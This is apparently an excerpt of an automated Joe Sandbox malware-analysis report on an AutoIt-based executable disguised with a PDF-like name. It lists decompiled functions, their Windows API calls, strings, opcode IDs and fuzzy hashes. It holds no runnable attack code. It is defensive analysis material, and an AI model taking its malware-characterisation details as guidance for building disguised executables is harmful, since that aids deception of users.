                                                    • Instruction Fuzzy Hash: 49E048752002046FC701EF5DD405D56B7ECAFB4751F04C826F945DB261DAB4F8048B90
                                                    Function 003874BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003874DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                                    • Instruction ID: f55e8c025028b3f9f5e8087677e8d45ba3067b661686cd29631404b781d3f10e
                                                    • Opcode Fuzzy Hash: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                                    • Instruction Fuzzy Hash: BBD017A116C30528E86B27268C0FE760D0AB3017C0FA281C9B082CB4C2A890E8419322
                                                    Function 0037B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0037AD3E), ref: 0037B124
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                                    • Instruction ID: 3ddd800b0238830e31928f434938351b97faafc4bfb7e6c4565cb1f22d8a9e48
                                                    • Opcode Fuzzy Hash: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                                    • Instruction Fuzzy Hash: 4FD09E321A465EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50
                                                    Function 003BB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                                    • Instruction ID: b4d09410828885e75fd20503df3b4c4f8771999a64d7ad7048d55cbd827a7c28
                                                    • Opcode Fuzzy Hash: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                                    • Instruction Fuzzy Hash: 9AC04CB1400519DFC752CBC4C944DEEBBBCAB04705F104091A205F1510D7709B459B72
                                                    Function 00368189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036818F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                                    • Instruction ID: c0941c94a92eba0e3fb1f1d5d24a2bf024f9d3ae856ecc726d16c9ef3ea4985a
                                                    • Opcode Fuzzy Hash: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                                    • Instruction Fuzzy Hash: 00A0113200020CAB8F022B82EC088883F2CEA002A0B000022F80C800208B22A8208A82
                                                    Function 003493F0 Relevance: .5, Instructions: 531COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b377004cddf082c7f599df9f62e15f34ff79cd352a699b718312fac6ce41e89
                                                    • Instruction ID: 7edddc4e0f36288a68b9c86e4c87df65d5f0dd2b01b578b755899ec6a010cbec
                                                    • Opcode Fuzzy Hash: 2b377004cddf082c7f599df9f62e15f34ff79cd352a699b718312fac6ce41e89
                                                    • Instruction Fuzzy Hash: 5012AF70A00609DFDF06DFA5D982AEEB7F9FF48300F104669E806EB655EB35A914CB50
                                                    Function 0034AF50 Relevance: .5, Instructions: 514COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3728558374-0
                                                    • Opcode ID: d024fc64f8b3c3eb2331a63bc909e8f64d5143ef2c775127deac404196f070fa
                                                    • Instruction ID: cc8d9543e8260733927136c815604cc07c3548d90be1219da42269c445330ec5
                                                    • Opcode Fuzzy Hash: d024fc64f8b3c3eb2331a63bc909e8f64d5143ef2c775127deac404196f070fa
                                                    • Instruction Fuzzy Hash: 700290B0A00105DBCF16DF64D981AAFBBF9EF44300F118469E906DF265EB31EA15CB91
                                                    Function 003602A4 Relevance: .3, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction ID: d6eb7c5c7d737e47d6f8e9286e90ac72b5232ca2958a4fcef1f62ea417529371
                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction Fuzzy Hash: 0AC186362051930EDF2F463AD47643FBAA15A927B231B476DD8B3CB5E9EF10C528D620
                                                    Function 003606D9 Relevance: .3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction ID: 3e2567311adf72461193e9270d7becd74cdb4062f4428ac1e398cd964e845d6f
                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction Fuzzy Hash: CAC1933220519309DF6E4639C47643FBAA15EA27B231B476DD8B2CB5E9EF20D528D620
                                                    Function 0035FE6F Relevance: .3, Instructions: 331COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction ID: 439ba88042f54c40915f64ded7d7e040b157af9c156a2912882618d2434cdb69
                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction Fuzzy Hash: 8BC194322051930EDF2F4639D43693FBAA15AA27B631B477DD8B2CB5E5EF10C528D620
                                                    Function 0035FA57 Relevance: .3, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: 444172c533d47946d9c84d1d1e91971991adb3d61e511cf476c24dd5f57d3d45
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 65C170322050930DDF2E4639D47583EBAA15AA2BB631B077DDCB2CB5F5EF20C568D620
                                                    Function 0039A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0039A2FE
                                                    • DeleteObject.GDI32(00000000), ref: 0039A310
                                                    • DestroyWindow.USER32 ref: 0039A31E
                                                    • GetDesktopWindow.USER32 ref: 0039A338
                                                    • GetWindowRect.USER32(00000000), ref: 0039A33F
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0039A480
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0039A490
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A4D8
                                                    • GetClientRect.USER32(00000000,?), ref: 0039A4E4
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0039A51E
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A540
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A553
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A55E
                                                    • GlobalLock.KERNEL32(00000000), ref: 0039A567
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A576
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0039A57F
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A586
                                                    • GlobalFree.KERNEL32(00000000), ref: 0039A591
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A5A3
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003CD9BC,00000000), ref: 0039A5B9
                                                    • GlobalFree.KERNEL32(00000000), ref: 0039A5C9
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0039A5EF
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0039A60E
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A630
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A81D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                                    • Instruction ID: f8cfe5cc25906495f709f0d124b1006922e5bafb012733748bc70168c1f46f32
                                                    • Opcode Fuzzy Hash: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                                    • Instruction Fuzzy Hash: 16025D75900114EFDB16DFA5DD89EAE7BB9EB48310F048668F905EB2A0C770AD41CBA0
                                                    Function 003AD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 003AD2DB
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AD30C
                                                    • GetSysColor.USER32(0000000F), ref: 003AD318
                                                    • SetBkColor.GDI32(?,000000FF), ref: 003AD332
                                                    • SelectObject.GDI32(?,00000000), ref: 003AD341
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD36C
                                                    • GetSysColor.USER32(00000010), ref: 003AD374
                                                    • CreateSolidBrush.GDI32(00000000), ref: 003AD37B
                                                    • FrameRect.USER32(?,?,00000000), ref: 003AD38A
                                                    • DeleteObject.GDI32(00000000), ref: 003AD391
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 003AD3DC
                                                    • FillRect.USER32(?,?,00000000), ref: 003AD40E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AD439
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(00000012), ref: 003AD5AE
                                                      • Part of subcall function 003AD575: SetTextColor.GDI32(?,?), ref: 003AD5B2
                                                      • Part of subcall function 003AD575: GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(0000000F), ref: 003AD5D3
                                                      • Part of subcall function 003AD575: GetSysColor.USER32(00000011), ref: 003AD5F0
                                                      • Part of subcall function 003AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                                      • Part of subcall function 003AD575: SelectObject.GDI32(?,00000000), ref: 003AD60F
                                                      • Part of subcall function 003AD575: SetBkColor.GDI32(?,00000000), ref: 003AD618
                                                      • Part of subcall function 003AD575: SelectObject.GDI32(?,?), ref: 003AD625
                                                      • Part of subcall function 003AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                                      • Part of subcall function 003AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                                      • Part of subcall function 003AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                                      • Part of subcall function 003AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: 0c99c9222b683412064073be6bc6b97647a4f1eab7e525e317a07406b3926656
                                                    • Instruction ID: 2a08d7f8bdd0023a7b5e55fee49ffd43d5aac24c666b6d9dc73d57ae658323d2
                                                    • Opcode Fuzzy Hash: 0c99c9222b683412064073be6bc6b97647a4f1eab7e525e317a07406b3926656
                                                    • Instruction Fuzzy Hash: E2915E71408301BFDB129F64DC48E6BBBADFB8A325F100A29F962D65E0D771E944CB52
                                                    Function 0035B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32 ref: 0035B98B
                                                    • DeleteObject.GDI32(00000000), ref: 0035B9CD
                                                    • DeleteObject.GDI32(00000000), ref: 0035B9D8
                                                    • DestroyIcon.USER32(00000000), ref: 0035B9E3
                                                    • DestroyWindow.USER32(00000000), ref: 0035B9EE
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 003BD2AA
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003BD2E3
                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003BD711
                                                      • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                                    • SendMessageW.USER32 ref: 003BD758
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003BD76F
                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 003BD785
                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 003BD790
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                                    • Instruction ID: 02220358ca7dfa75f05fd2246a56ad2e17666b41c9b5887f96d1e26fc11f5668
                                                    • Opcode Fuzzy Hash: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                                    • Instruction Fuzzy Hash: 09129C34204201DFDB26CF28C884FA9BBE5FF45309F554569FA89CBA62DB31E845CB91
                                                    Function 00399F50 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 00399F83
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0039A042
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0039A080
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0039A092
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0039A0D8
                                                    • GetClientRect.USER32(00000000,?), ref: 0039A0E4
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0039A128
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0039A137
                                                    • GetStockObject.GDI32(00000011), ref: 0039A147
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0039A14B
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0039A15B
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039A164
                                                    • DeleteDC.GDI32(00000000), ref: 0039A16D
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0039A19B
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039A1B2
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0039A1ED
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039A201
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039A212
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0039A242
                                                    • GetStockObject.GDI32(00000011), ref: 0039A24D
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0039A258
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0039A262
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 3f1855f2312128b6081f0bb2b52b682dbc1314f985e89dc0dc564d43c59a904c
                                                    • Instruction ID: b140fcbb550ab5a52d340052a81c4331122183ec95d97ddc764e047426cc14d1
